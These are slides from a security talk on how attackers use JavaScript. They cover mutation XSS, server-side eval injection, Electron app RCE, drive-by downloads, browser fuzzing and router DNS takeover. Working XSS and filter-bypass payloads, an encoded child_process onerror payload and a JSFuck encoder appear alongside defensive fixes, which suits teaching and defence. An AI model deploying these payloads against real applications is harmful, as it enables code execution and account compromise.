Slide 1

Slide 1 text

CAPTAIN MARVELLOUS JAVASCRIPT: A LOOK AT THE VERSATILITY OF JS AND HOW HACKERS USE IT

Slide 2

Slide 2 text

ABOUT ME? • Riyaz Walikar, Chief Hacker @Appsecco • Several years of security experience in breaking things (Offensive Security) • All kinds of things (applications/mobile/systems/networks/wireless/cloud) • Love to travel, do photography and stargaze • Comic nerd Appsecco – https://appsecco.com @appseccouk

Slide 3

Slide 3 text

WHAT IS THIS TALK ABOUT?
• The versatility of JS and its application in unorthodox circumstances and in offensive use cases
• JavaScript is everywhere. As much as it is used to build things, there are many cases where hackers use JS to break things as well
• We will look at examples from computer security where JS is used to detect vulnerabilities, build payloads and reliably exploit software, infrastructure and humans alike
• This talk introduces the various applications of JS (or its variants) from an attacker's point of view, with real-world examples along the way

Slide 4

Slide 4 text

JAVASCRIPT AND XSS: IS THAT IT? I CONFIRMED WHEN YOU PROMPTED FOR AN ALERT

Slide 5

Slide 5 text

IS THIS ALL THERE IS TO XSS?

Slide 6

Slide 6 text

WE ALL KNOW
• XSS occurs when user controlled data is placed into a page without being encoded for its context, so the browser parses it as HTML or JavaScript instead of treating it as data
• Once that data runs in the browser's JS engine it has exactly the same capabilities as JavaScript the developer wrote: same origin, same cookies, same DOM

Slide 7

Slide 7 text

WHAT XSS IS CAPABLE OF
(Image slide: "How most developers see XSS" next to "How most attackers see XSS")
https://www.polygon.com/2017/5/17/15624888/guardians-of-the-galaxy-vol-2-mantis-wrong
https://www.looper.com/63592/untold-truth-baby-groot/

Slide 8

Slide 8 text

WHAT CAN YOU DO WITH XSS?
• XSS can be used to (not an exhaustive list)
– Read session data and send it elsewhere
– Read secrets in the DOM
– Redirect users to malware-infested sites or pornographic content
– Steal CPU time to mine cryptocurrency
– Log keystrokes (credentials)
– Browser exploitation and remote code execution
– Phishing attacks / framing content
– Reach internal routers through the victim's browser and change the DNS or gateway settings to intercept all network traffic

Slide 9

Slide 9 text

I'VE GOT NO BEEF WITH YOU!
• Framework for controlling browsers ("zombies") hooked through an XSS or a malicious page
• Features of BeEF (Browser Exploitation Framework)
– Browser and OS fingerprinting
– User behaviour fingerprinting and social engineering
– Fake Flash update to install a rogue extension
– Identify the internal IP address
– Port scanner, network map creation
– Run Metasploit modules to perform exploitation
– Tunnel traffic through the browser
– Geolocation of the browser

Slide 10

Slide 10 text

No content

Slide 11

Slide 11 text

No content

Slide 12

Slide 12 text

DEMO: BEEF IN ACTION

Slide 13

Slide 13 text

MUTATION XSS: NOT CANCEROUS BUT MORE LIKE JEAN GREY

Slide 14

Slide 14 text

MUTATION WHAT?
• First described by Mario Heiderich and colleagues in 2013, mutation XSS (mXSS) relies on the browser changing a string when it is parsed into the DOM, serialised back out (for example through innerHTML) and parsed again
• The earliest known example was found by researcher Yosuke Hasegawa in IE's innerHTML in 2007
• He noticed that in IE, an element's attribute bled into the document in Print Preview when the attribute value contained backticks

Slide 15

Slide 15 text

• IN: ``onerror=alert(1)
• OUT: ``onerror=alert(1)
https://tenor.com/view/what-thor-confused-chris-hemsworth-gif-13355644

Slide 16

Slide 16 text

MUTATION WHAT?
• User controlled input looks innocuous as it passes through server filters, client filters, WAFs, browser protections etc., but is made malicious by the browser itself when it is injected into innerHTML
• Over the years, multiple vectors have been discovered that trick browsers into rendering malicious content from strings that passed every filter and protection as harmless

Slide 17

Slide 17 text

CS: THE GOOGLE XSS
• Most attackers dream of getting an XSS on the Google home page via the search bar

Slide 18

Slide 18 text

CS: THE GOOGLE XSS: BACKGROUND
• On 26 Sept 2018, a developer working on the Closure library created a commit that removed part of the input sanitisation. The Google search bar uses the Closure library
• In Feb 2019, Masato Kinugawa discovered that this allowed a mutation when a noscript tag was used with malformed HTML: Closure's sanitiser parsed the input inside a template element, serialised the result, and the page rendered that string through a div's innerHTML
• To understand this better, let's look at how browsers mutate broken HTML

Slide 19

Slide 19 text

CS: THE GOOGLE XSS: BROWSER MUTATIONS
• Save this as a.html
• Save this as b.html: <script><div title="">
• Open both in Chrome and view the rendered source in the DevTools console

Slide 20

Slide 20 text

CS: THE GOOGLE XSS: BROWSER MUTATIONS
<script><div title="">

Slide 21

Slide 21 text

CS: THE GOOGLE XSS: THE NOSCRIPT TAG MUTATION
• The Closure library used a `template` element to obtain "safe" HTML that was then passed to a `div`
• The contents of a `template` are parsed with scripting disabled, so the parser treats the inside of a `noscript` element as ordinary markup; a `div` in a live page is parsed with scripting enabled, so the inside of `noscript` is raw text up to the first literal `</noscript>`
• If we pass a `` tag containing a broken noscript tag and an XSS vector, the noscript content is parsed one way by the `template` (where the sanitiser sees only harmless elements) and another way by the `div`, and the XSS triggers
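To make the two parsing modes concrete, here is an added example (not Closure's sanitiser, and not a full HTML parser): a deliberately minimal tag tokenizer that applies just one rule of the HTML specification, that `<noscript>` content is raw text when scripting is enabled and ordinary markup when it is disabled. The payload string is constructed in the shape the slide describes (a noscript element whose child carries an attribute containing `</noscript>` and an image vector); the exact attribute wrapping is an assumption.

```javascript
// Added example: a toy tokenizer that lists the tags a parser would see.
// It is NOT the Closure sanitizer; it models one spec rule only:
// with scripting enabled, <noscript> switches the tokenizer to raw text,
// so nothing inside it is a tag until the literal "</noscript>".
// With scripting disabled (template contents, inert documents), the
// content of <noscript> is parsed as normal markup.
function tagsSeen(html, scriptingEnabled) {
  const seen = [];
  const lower = html.toLowerCase();
  let i = 0;
  while (i < html.length) {
    if (html[i] !== '<') { i++; continue; }
    let j = i + 1;
    let closing = false;
    if (html[j] === '/') { closing = true; j++; }
    let name = '';
    while (j < html.length && /[a-z0-9]/i.test(html[j])) name += html[j++];
    if (name === '') { i++; continue; }          // a lone "<" in text
    name = name.toLowerCase();
    // Skip attributes; a quoted value may legally contain "<" and ">".
    let quote = null;
    while (j < html.length) {
      const c = html[j];
      if (quote) { if (c === quote) quote = null; }
      else if (c === '"' || c === "'") quote = c;
      else if (c === '>') break;
      j++;
    }
    i = j + 1;
    seen.push((closing ? '/' : '') + name);
    if (!closing && name === 'noscript' && scriptingEnabled) {
      // RAWTEXT: everything up to the first "</noscript>" is text.
      const end = lower.indexOf('</noscript>', i);
      if (end === -1) break;
      seen.push('/noscript');
      i = end + '</noscript>'.length;
    }
  }
  return seen;
}

// Constructed payload in the shape the slide describes: a <noscript> whose
// child has an attribute value containing "</noscript>" and an XSS vector.
const MUTATION_PAYLOAD =
  '<noscript><p title="</noscript><img src=x onerror=alert(1)>"></noscript>';

// What a sanitizer parsing with scripting disabled (template) sees.
function sanitizerView() { return tagsSeen(MUTATION_PAYLOAD, false); }

// What the live page sees when the same string hits div.innerHTML.
function browserView() { return tagsSeen(MUTATION_PAYLOAD, true); }
```

The sanitizer's view is `noscript, p, /noscript` (a paragraph with a long but harmless title attribute); the browser's view of the very same string is `noscript, /noscript, img, /noscript`, and that `img` carries the `onerror` handler. Any allowlist check that runs in the first parsing mode and renders in the second has this gap.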

Slide 22

Slide 22 text

No content

Slide 23

Slide 23 text

SERVER SIDE JS ATTACKS: LET'S GIVE JS FULL ACCESS TO SERVER RESOURCES, SAID NO ONE EVER

Slide 24

Slide 24 text

“User supplied data should never be used inside an execution context without first checking if the data has any special meaning within that context”
- Every programming language ever
https://www.businessinsider.in/The-best-part-of-the-Captain-Marvel-trailer-has-now-become-a-hilarious-meme/articleshow/65875962.cms

Slide 25

Slide 25 text

THE PERILS OF SERVER SIDE USER CODE
• Where is the data coming from?
• Where will the data be processed?
• Will the function processing the data validate that the data is benign within its context?
• Server side processing has access to the OS and its resources
• User supplied data may be able to traverse server side objects and reach functions that would otherwise remain hidden or protected

Slide 26

Slide 26 text

SERVER SIDE JS INJECTION: SPOT THE BUG
• A Server Side JavaScript Injection occurs when user input is passed to a server side function that evaluates it as JavaScript. Several functions do this: eval(), setTimeout() and setInterval() when handed a string instead of a function, and the Function() constructor

Slide 27

Slide 27 text

DEMO: REMOTE CODE EXECUTION
• Crudely written web service (remember, I'm not a dev ☺)
• Try it out from here: https://github.com/appsecco/vulnerable-apps/tree/master/node-simple-rce
• Has multiple routes that perform multiple functions
• Written in Node.js (Express) with a MongoDB backend
• Quick test cases to check if user input ends up in an eval context
– Maths: 5-4 (comes back as 1)
– JS objects: undefined, String
– Response objects: res, resp, response, rs
• Then load other modules using require and use res.send to get the output back
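As an added example (not the node-simple-rce app's code), here is the same "calculator" handler written twice: once the way the vulnerable routes do it, with the user's string handed to `eval()`, and once hardened with a small parser that only understands integer arithmetic. Express is left out; each function takes the raw expression string a route would receive, and the `probe` helper is a constructed stand-in for the slide's quick test cases.

```javascript
// Added example (not the node-simple-rce app): a calculator route written
// twice. Both functions receive the expression the user submitted.

// VULNERABLE: user input reaches eval() and runs with the server's privileges.
// "5-4" returns 1, but so does anything else that is valid JavaScript,
// e.g. "process.pid" or "require('child_process').execSync('id')".
function calcVulnerable(expr) {
  return eval(expr);
}

// HARDENED: a tiny recursive-descent parser that accepts only integer
// arithmetic (+ - * / and parentheses) and rejects everything else.
// No JavaScript engine ever sees the user's string as code.
function calcSafe(expr) {
  const tokens = expr.match(/\d+|[-+*/()]|\S/g) || [];
  let pos = 0;
  const peek = () => tokens[pos];
  const next = () => tokens[pos++];
  const fail = (msg) => { throw new Error('rejected: ' + msg); };

  function factor() {
    const t = next();
    if (t === undefined) fail('unexpected end of input');
    if (t === '(') {
      const v = expression();
      if (next() !== ')') fail('expected )');
      return v;
    }
    if (t === '-') return -factor();
    if (/^\d+$/.test(t)) return Number(t);
    fail('unexpected token ' + JSON.stringify(t));
  }
  function term() {
    let v = factor();
    while (peek() === '*' || peek() === '/') {
      const op = next();
      const r = factor();
      v = op === '*' ? v * r : v / r;
    }
    return v;
  }
  function expression() {
    let v = term();
    while (peek() === '+' || peek() === '-') {
      const op = next();
      const r = term();
      v = op === '+' ? v + r : v - r;
    }
    return v;
  }

  const result = expression();
  if (pos !== tokens.length) fail('trailing input ' + JSON.stringify(tokens[pos]));
  return result;
}

// The slide's quick tests, as a helper: send an input, see whether the
// handler evaluated it. "5-4" coming back as 1 means you are in an eval
// context; "process.pid" returning a number confirms it is Node.
function probe(handler, input) {
  try { return { ok: true, value: handler(input) }; }
  catch (e) { return { ok: false, error: e.message }; }
}
```

The hardened version turns "is this input dangerous?" (a question nobody can answer for a Turing-complete language) into "is this input inside the grammar I chose to accept?", which a 40-line parser answers reliably.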

Slide 28

Slide 28 text

JS AND DESKTOP APPLICATIONS

Slide 29

Slide 29 text

MIXING DESKTOP CLIENTS AND JAVASCRIPT (WCGW)
• JavaScript is now on the desktop via Electron
• Electron = Chromium front end + Node.js back end = pseudo-native, platform-agnostic app
• A lot of commonly used applications have been ported to Electron
• So from an attacker's point of view
– You have an app running on your desktop
– To which I can send input (via a message, network traffic, hosted content, a shared file or any other feature)
– The app uses JS to parse the input I provide
– WCGW

Slide 30

Slide 30 text

SOME ELECTRON APPS
• Visual Studio Code (FTW)
• Slack
• Skype
• LosslessCut
• Waiterio Restaurant POS
• Microsoft Teams
• Snipline
• Windows 95

Slide 31

Slide 31 text

https://github.com/felixrieseberg/windows95

Slide 32

Slide 32 text

CS: CODE EXECUTION USING JAVASCRIPT IN A DESKTOP APP
• AttackSurfaceAnalyzer (ASA) is a tool that takes a snapshot of your system state before and after the installation of other software and displays changes to a number of key elements of the system's attack surface
• ASA uses Electron.NET, a wrapper around a "normal" Electron application with an embedded ASP.NET Core application. Electron APIs are invoked from .NET over an Electron.NET IPC bridge
• An RCE was discovered in ASA because the infamous nodeIntegration flag was set to true
• This allows a JavaScript payload running in the app's window to spawn processes on the target

Slide 33

Slide 33 text

CS: CODE EXECUTION USING JAVASCRIPT IN A DESKTOP APP: WHAT WAS THE ISSUE AND THE EXPLOIT?
• The nodeIntegration flag was set to true in WebPreferences.cs
• With it on, page JavaScript can require() Node modules such as process_wrap or child_process
• An XSS in the renderer therefore becomes OS-level command execution on the machine running the app

Slide 34

Slide 34 text

CS: CODE EXECUTION USING JAVASCRIPT IN A DESKTOP APP: TRIGGERING THE PAYLOAD AND CODE EXEC
• Using an encoder to convert the payload to either base64 or charCode form, the entire payload can be passed via an onerror trigger
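The two encodings the slide mentions, as an added example that is not the ASA exploit: the payload is a constructed placeholder of the kind nodeIntegration makes possible (renderer code reaching Node's `child_process`), and the `Buffer` calls are only for the encoder side, since `atob` is what the browser side decodes with (it is also a global in Node 16 and later).

```javascript
// Added example, not the ASA exploit: wrap a JavaScript payload so that it
// can ride inside an HTML event handler attribute without quotes, angle
// brackets or other characters a filter might strip.

// A payload of the kind nodeIntegration makes possible: the renderer's
// require() reaches Node's child_process. Constructed; the command is a
// harmless placeholder.
const RCE_PAYLOAD = "require('child_process').exec('calc.exe')";

// Variant 1: String.fromCharCode(...) uses only digits, commas and parens,
// so it survives filters that strip quotes or angle brackets.
function toCharCode(js) {
  const codes = Array.from(js, (ch) => ch.charCodeAt(0)).join(',');
  return `String.fromCharCode(${codes})`;
}

// Variant 2: base64 decoded with atob() on the browser side; shorter, but
// the argument needs quotes.
function toBase64Call(js) {
  const b64 = Buffer.from(js, 'utf8').toString('base64');
  return `atob('${b64}')`;
}

// Wrap the decoder expression in an element whose error handler evaluates
// it. src=x is anything that fails to load, so onerror always fires.
function onerrorTrigger(decoderExpr) {
  return `<img src=x onerror="eval(${decoderExpr})">`;
}

// Round trip: what the browser obtains just before it calls eval().
// (We only decode the string here; nothing executes the payload.)
function decodeCharCode(expr) {
  return eval(expr);   // the expression is our own fromCharCode(...) call
}
function decodeBase64Call(expr) {
  const m = /^atob\('([A-Za-z0-9+/=]*)'\)$/.exec(expr);
  if (!m) throw new Error('not an atob() call');
  return Buffer.from(m[1], 'base64').toString('utf8');
}
```

Nothing about the encoding is clever; it only exists because filters look for literal strings. The fix is on the other side: with nodeIntegration off and contextIsolation on, the decoded `require(...)` is just a ReferenceError in the renderer.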

Slide 35

Slide 35 text

No content

Slide 36

Slide 36 text

CS: RCE VIA COMMAND LINE ARGS IN EXODUS WALLET
• Electron was vulnerable to a protocol handler vulnerability affecting apps that use custom protocol handlers
• Assigned CVE-2018-1000006
• Electron apps designed to run on Windows that register themselves as the default handler for a protocol, like myapp://, were vulnerable
• A ton of apps became vulnerable because the protocol handler could be used to pass additional command line parameters to the Chromium process running the app
• Example of this bug in Exodus, a cryptocurrency wallet

Slide 37

Slide 37 text

CS: RCE VIA COMMAND LINE ARGS IN EXODUS WALLET: THE BUG
• Exodus registers a protocol handler, exodus://, which when invoked launches the app
• Browsing to a page containing the following code results in Exodus launching with the command line args provided

Slide 38

Slide 38 text

CS: RCE VIA COMMAND LINE ARGS IN EXODUS WALLET: THE EXPLOIT
• Using the list at https://peter.sh/experiments/chromium-command-line-switches/, a command line switch was identified that allows a custom program to be launched

Slide 39

Slide 39 text

CS: HTML INJECTION IN SIGNAL VIA REACT HANDLER
• A quoted reply in Signal led to evaluation of HTML content
• Signal internally uses React to render UI elements in the Chromium window
• The issue was in how the renderText() function in Quote.tsx set the HTML in the window

Slide 40

Slide 40 text

CS: HTML INJECTION IN SIGNAL VIA REACT HANDLER: THE EXPLOIT
• Because the exploit relies on the victim quoting a message containing valid HTML, an attacker sends messages whose HTML elements are first rendered as literal text
• When such a message is quoted in a reply, the HTML becomes part of the window, and an innerHTML assignment can cause execution
• No public PoC was released; however a message such as the following would work in this context
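The fix for this class of bug, in both the XSS definition earlier and the Signal case, is to treat message text as text. Here is an added example, not Signal's code: the same quote rendered by string interpolation into markup (the pattern behind innerHTML and dangerouslySetInnerHTML bugs) and rendered with entity encoding first. The quote structure and the hostile message are constructed.

```javascript
// Added example, not Signal's code: render a quoted message the unsafe
// way (raw interpolation into markup) and the safe way (entity-encode
// before interpolating). Message content is constructed.

// Encode the five characters that carry meaning in HTML element content
// and in double- or single-quoted attribute values.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// UNSAFE: the attacker's text becomes markup as soon as this string is
// assigned to innerHTML (or handed to dangerouslySetInnerHTML).
function renderQuoteUnsafe(quote) {
  return `<div class="quote" title="${quote.author}"><p>${quote.text}</p></div>`;
}

// SAFE: every interpolation is encoded. Both contexts used here (element
// body and double-quoted attribute) are covered by the entity set above;
// a URL or a JavaScript context would need its own encoder.
function renderQuoteSafe(quote) {
  return `<div class="quote" title="${escapeHtml(quote.author)}">` +
         `<p>${escapeHtml(quote.text)}</p></div>`;
}

// A message that attacks both contexts: the author breaks out of the
// title attribute, the body injects an element with an event handler.
const HOSTILE_QUOTE = {
  author: 'mallory" onmouseover="alert(1)',
  text: '<img src=x onerror=alert(1)>',
};
```

In React, writing `{quote.text}` in JSX performs this encoding for you; the Signal bug was in a code path that bypassed it.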

Slide 41

Slide 41 text

BREAKING FILTERS AND WAFS? WHY BLACKLISTS DON'T MATTER

Slide 42

Slide 42 text

COMMON BYPASSES
• JS objects, variables and functions can be represented in many forms
• If the PoC is to generate an alert box, several different forms of calling alert work
• Depending on the filter being targeted, you need to analyse the output that comes back for various mutations of the input
• Primarily, the following kinds of manipulation can be tried
– Representing an object differently
– Using encoding techniques
– String and object manipulation to access functions and attributes
– Relying on browser and JS engine implementation details to transform innocuous objects

Slide 43

Slide 43 text

COMMON BYPASSES
• Some of the more common representations and usages include the following cases
– alert(/xss/)
– eval("ale"+"rt(0)")
– Function("aler"+"t(0)")()
– onerror="alert;throw 1"
– onerror=eval;throw'=confirm\x281\x29';
– javascript:\u0061lert(1)
–
– eval(17795081..toString(36)+"(0)")
– " onmouonmouseoverseover=alalertert(0)
– self['\x61\x6c\x65\x72\x74']('\x58\x53\x53')

Slide 44

Slide 44 text

JS WEIRDNESS (FOR ATTACKERS)
• JS can get real weird real quick, and for attackers the alternative representations double as attack payloads
• It's perfectly legal JS, but the representation itself makes it look weird™
• Using an obscure style of JS called JSFuck, you can create objects, strings and other entities ready for execution without writing a single letter or digit
• It uses only six characters to write and execute code: ()+[]!
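How those six characters turn into letters, and then into a function call, as an added example: this is a hand-rolled mini encoder for illustration, not the JSFuck library, and it only knows the letters reachable from the handful of coercion tricks listed in it (JSFuck has more tricks for the rest of the alphabet). Everything it emits is checked to contain only `()+[]!`.

```javascript
// Added example (a hand-rolled mini encoder, not the JSFuck library): how
// strings and the Function constructor are built from ()+[]! alone.

// Expressions that coerce to useful strings using nothing but ()+[]!.
const PRIMITIVE_ATOMS = {
  'false':     '(![]+[])',     // ![] is false; +[] turns it into "false"
  'true':      '(!![]+[])',
  'undefined': '([][[]]+[])',  // []["" ] is undefined
  'NaN':       '(+[![]]+[])',  // +[false] is NaN
};

// Which atom and index yields each character (first sighting wins).
const CHARS = {};
function learn(text, expr) {
  for (let i = 0; i < text.length; i++) {
    if (!(text[i] in CHARS)) CHARS[text[i]] = [expr, i];
  }
}
for (const [text, expr] of Object.entries(PRIMITIVE_ATOMS)) learn(text, expr);

// A non-negative integer written with the six characters: true+true+...
function num(n) {
  if (n === 0) return '+[]';
  if (n === 1) return '+!![]';
  return Array(n).fill('!![]').join('+');
}

// A string, one character per atom lookup, joined with +.
function spell(word) {
  return Array.from(word, (ch) => {
    if (!(ch in CHARS)) throw new Error(`no atom yields ${JSON.stringify(ch)}`);
    const [expr, i] = CHARS[ch];
    return `${expr}[${num(i)}]`;
  }).join('+');
}

// Once "fill" can be spelled, []["fill"]+[] gives the native function's
// source text "function fill() { [native code] }", which supplies c, o, v.
learn('function fill() { [native code] }', `([][${spell('fill')}]+[])`);

// []["filter"]["constructor"] is Function: handed a spelled-out source
// string it returns a callable, which is how JSFuck executes code.
function functionConstructor() {
  return `[][${spell('filter')}][${spell('constructor')}]`;
}

// True if an expression uses only the six JSFuck characters.
function isJsFuck(expr) {
  return /^[()+\[\]!]+$/.test(expr);
}
```

`spell('alert')` is already a few hundred characters long and `functionConstructor()` runs into the thousands, which is why JSFuck payloads are so easy to spot by size and so hard to spot by keyword.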

Slide 45

Slide 45 text

JS WEIRDNESS

Slide 46

Slide 46 text

JS WEIRDNESS

Slide 47

Slide 47 text

No content

Slide 48

Slide 48 text

BREAKING FILTERS/WAFS
• Depending on the context where the reflection occurs, different forms of input can be tried
• For dynamic filters that strip blacklisted words like onmouseover, onload etc., the following test cases can be applied
– " onmouonmouseoverseover=alalertert(0
–
– " ontouch=alert(0)
• Some filters do not detect payloads that use newline or whitespace characters
– " name=test%0d%0aalert(0)
• If the WAF/filter lets Unicode escapes through, you could use something like
– xss\"\u003E\u003Ch1 onmous\u0045over=al\u0065r\u0074(domain)\u003EPayload\u003C/h1\u003E
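The "strip blacklisted words" filter from this slide and the previous one's payload list, run against each other, as an added example. The filters are toy denylists constructed for the demonstration, not any real WAF's rule set; the payloads are the ones on the slides.

```javascript
// Added example: toy denylist filters of the kind the slides bypass, with
// the slides' own payloads run through them. The word list is constructed.

const WORDS = 'onmouseover|onload|onerror|alert|script';

// Filter 1: strip each banned word once, the most common home-grown filter.
function stripOnce(input) {
  return input.replace(new RegExp(WORDS, 'gi'), '');
}

// Filter 2: strip until a pass changes nothing. Defeats the nesting trick
// below, still blind to payloads that never spell a banned word.
function stripRecursive(input) {
  let prev, cur = input;
  do { prev = cur; cur = prev.replace(new RegExp(WORDS, 'gi'), ''); } while (cur !== prev);
  return cur;
}

// Filter 3: reject instead of strip. Safer than rewriting the input,
// same blind spot.
function rejects(input) {
  return new RegExp(WORDS, 'i').test(input);
}

// Payload 1 (from the slides): each banned word wraps a copy of itself, so
// removing the inner copy once re-assembles the outer one.
const NESTED = '" onmouonmouseoverseover=alalertert(0)';

// Payload 2 (from the slides): hex escapes mean the banned words never
// appear in the request; the JS engine decodes them at run time. Written
// with doubled backslashes so the escapes reach the filter as text.
const HEXED = "self['\\x61\\x6c\\x65\\x72\\x74']('\\x58\\x53\\x53')";

// What the JS engine sees after decoding \xHH escapes (no eval needed).
function decodeHexEscapes(s) {
  return s.replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Payload 3 (from the slides): 17795081 in base 36 spells the function name.
function base36Word(n) {
  return n.toString(36);
}
```

A single-pass strip hands the browser `" onmouseover=alert(0)`, a cleaner payload than the one that went in. The recursive strip and the reject filter both stop that one, and neither has any opinion about `\x61\x6c\x65\x72\x74`, because the string `alert` only exists after the JS engine has decoded it.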

Slide 49

Slide 49 text

MALWARE, JAVASCRIPT AND OBFUSCATION: YOU WILL NOT BELIEVE WHAT HAPPENED NEXT

Slide 50

Slide 50 text

MALWARE AND THE INTERNET
• Almost all modern malware infections, social engineering attempts, phishing and targeted ad campaigns are now delivered through the Internet
• Attackers compromise high-traffic websites and inject malicious JavaScript into the page, or add an iframe that redirects the user to a phishing site or simply prompts them to download and run "antivirus software"
• The compromise may have been done using a stored XSS, a weak admin password, a server side code execution vulnerability or a vulnerable library hosted on a CDN
• Attackers also rely heavily on users' browsing habits, clickbait articles and belief in phishing emails to achieve what is known as a "drive-by download" attack

Slide 51

Slide 51 text

GETTING A USER TO NAVIGATE
https://www.thedailystar.net/shout/the-internet/news/five-stages-dealing-clickbait-1734130

Slide 52

Slide 52 text

CS: DRIVE BY DOWNLOADS https://www.reddit.com/r/MovieDetails/comments/87xkts/at_the_end_of_avengers_age_of_ultron_tony_stark/

Slide 53

Slide 53 text

No content

Slide 54

Slide 54 text

No content

Slide 55

Slide 55 text

CS: DRIVE BY DOWNLOADS: THE ATTACK CHAIN
• Users are tricked into navigating to a site laden with JS that profiles the browser, add-ons, the OS and any other plugins that may be active (think Flash, Java, Silverlight (?))
• A legitimate site may also be infected with malicious JavaScript via a server side vulnerability or a compromised CDN
• A weakness in the browser or a third-party component is exploited to download and run additional code without user interaction
• The user may additionally or alternatively be phished into downloading and running a binary, irrespective of any browser weakness
• The binary, once running natively on the machine, gives the attacker complete access, letting them manage the machine remotely or add it to a larger botnet

Slide 56

Slide 56 text

CS: DRIVE BY DOWNLOADS: AN EXAMPLE EXPLOIT – AOL SUPERBUDDY
• A legitimate site was infected with malicious JS via SQL injection; the HTML was injected into every page on the site
• The script checks for a cookie to see whether the browser has been attacked before. If no cookie is found, a new cookie is set to mark the beginning of an exploit attempt
• A new iframe with zero dimensions is created using JS. This iframe loads another script from iroe.ru, which uses the User-Agent request header to detect the user's browser and operating system
• The returned script uses obfuscation and polymorphism to make analysis difficult
• It uses location.href as the key to decode its encoded strings, which defeats static analysis of the script on its own

Slide 57

Slide 57 text

CS: DRIVE BY DOWNLOADS: AN EXAMPLE EXPLOIT CONTD.
• A sample of the partially deobfuscated code is shown below
• The script attempts three exploits in an if chain, each targeting a different vulnerability
• The code creates an ActiveXObject from the AOL SuperBuddy plugin; if that succeeds it executes Exhne69P
• That function loads shellcode onto the browser's heap through various string manipulations, so that when the exploit triggers, execution lands in the loaded shellcode (heap spray)
• The actual exploit is triggered by invoking the LinkSBIcons method with a large integer, causing an overflow

Slide 58

Slide 58 text

USING JAVASCRIPT TO FUZZ BROWSERS: NOW YOU SEE ME, NOW YOU DON'T

Slide 59

Slide 59 text

BROWSER FUZZING?
• Create HTML pages containing JavaScript that creates and destroys DOM elements and then attempts to re-use the destroyed ones (example)
• Create several hundred or thousand mutations of these files as input for different browsers
• Load them in a browser attached to a debugger to monitor memory access and system usage
• A browser crash could mean access to a memory location or control of code flow caused by the input HTML+JS page
• May potentially lead to an info leak, remote code execution or a vulnerability that can be exploited further
• Many automated engines and tools are available to fuzz browsers, most of them open source
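A minimal generator for the first step of that procedure, as an added example: it is not Domato, Grinder or any real fuzzer, just a reproducible way to emit "create, destroy, touch again" pages. The tag list and the set of mutations are constructed; a real generator draws from a grammar of the whole DOM API. The seeded PRNG is the part worth copying: a page that crashes the browser must be regenerable from its seed.

```javascript
// Added example (not Domato, Grinder or any real fuzzer): a minimal,
// reproducible generator of DOM create/destroy/re-use test pages in the
// style the slide describes. Tag list and mutation set are constructed.

// xorshift32: same seed, same page, so a crashing case can be regenerated.
function makeRng(seed) {
  let s = (seed >>> 0) || 1;
  return (n) => {
    s ^= s << 13; s >>>= 0;
    s ^= s >>> 17;
    s ^= s << 5;  s >>>= 0;
    return s % n;
  };
}

const TAGS = ['div', 'table', 'tr', 'td', 'svg', 'iframe', 'select',
              'option', 'input', 'textarea', 'marquee', 'video'];

// Each statement is wrapped in try/catch so a DOMException (for example
// appending a node to itself) does not stop the rest of the case.
function generateStatements(seed, steps) {
  const rng = makeRng(seed);
  const vars = [];
  const out = [];
  for (let i = 0; i < steps; i++) {
    const action = vars.length === 0 ? 0 : rng(5);
    let stmt;
    switch (action) {
      case 0: {   // create a node and keep a live reference to it
        const v = `n${vars.length}`;
        const tag = TAGS[rng(TAGS.length)];
        stmt = `var ${v} = document.createElement("${tag}"); document.body.appendChild(${v});`;
        vars.push(v);
        break;
      }
      case 1:     // destroy
        stmt = `${vars[rng(vars.length)]}.remove();`;
        break;
      case 2:     // re-use: reparent, possibly under an already detached node
        stmt = `${vars[rng(vars.length)]}.appendChild(${vars[rng(vars.length)]});`;
        break;
      case 3:     // reparse children while other references point inside
        stmt = `${vars[rng(vars.length)]}.innerHTML = "<${TAGS[rng(TAGS.length)]}>x";`;
        break;
      default: {  // replace the node, then touch the old reference
        const v = vars[rng(vars.length)];
        stmt = `${v}.outerHTML = ""; ${v}.getBoundingClientRect();`;
      }
    }
    out.push(`try { ${stmt} } catch (e) {}`);
  }
  return out;
}

// One complete test page for a seed; write it to disk and open it in the
// browser under a debugger.
function generateCase(seed, steps = 40) {
  return `<!DOCTYPE html>\n<html><body><script>\n` +
         `${generateStatements(seed, steps).join('\n')}\n` +
         `</script></body></html>`;
}
```

Loop over a few thousand seeds, write each page out as `case-<seed>.html`, and keep only the seeds that crash the browser under the debugger; the generator will produce the identical page again when you need to minimise it.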

Slide 60

Slide 60 text

TOOLS, BROWSER CRASHES AND THE $$$
• Several popular tools like Domato and Grinder attempt to make browser fuzzing easier, even for novices
• Many researchers have written their own tools, scripts, debuggers and other automation around fuzzing browsers
• Browser fuzzing and exploitation is a lucrative industry
• Several companies buy exploits from researchers, including the browser vendors themselves
• Events like Pwn2Own and other conferences offer cash prizes upwards of 40,000 USD to hackers who successfully hack major browsers
• Browser vendors run bug bounty programs to patch vulnerabilities safely while paying researchers for their work and working exploits

Slide 61

Slide 61 text

No content

Slide 62

Slide 62 text

No content

Slide 63

Slide 63 text

ATTACKING NETWORK DEVICES USING JAVASCRIPT: ADMIN ADMIN AND FUN THINGS

Slide 64

Slide 64 text

TAKING OVER THE DNS OF A NETWORK – ATTACK SCENARIO
• A user browses to a website using a browser like Chrome or Firefox
• The browser loads a piece of JavaScript that uses WebRTC to find the internal IP address of the machine
• This IP is passed to another function that derives the presumed gateway address from it and loads an image from the gateway
• The image URL carries the router's default credentials, so the HTTP Basic Auth challenge succeeds
• When the image loads successfully, additional functions are called to change the router's DNS settings and make the admin console reachable from the Internet

Slide 65

Slide 65 text

TAKING OVER THE DNS OF A NETWORK – CODE SNIPPET
• A simple HTML page example

Slide 66

Slide 66 text

TAKING OVER THE DNS OF A NETWORK – CODE SNIPPET
• The bodyOnLoad function that retrieves the internal IP using WebRTC

Slide 67

Slide 67 text

TAKING OVER THE DNS OF A NETWORK – ATTACK SCENARIO
• The bodyOnLoad function that retrieves the internal IP using WebRTC
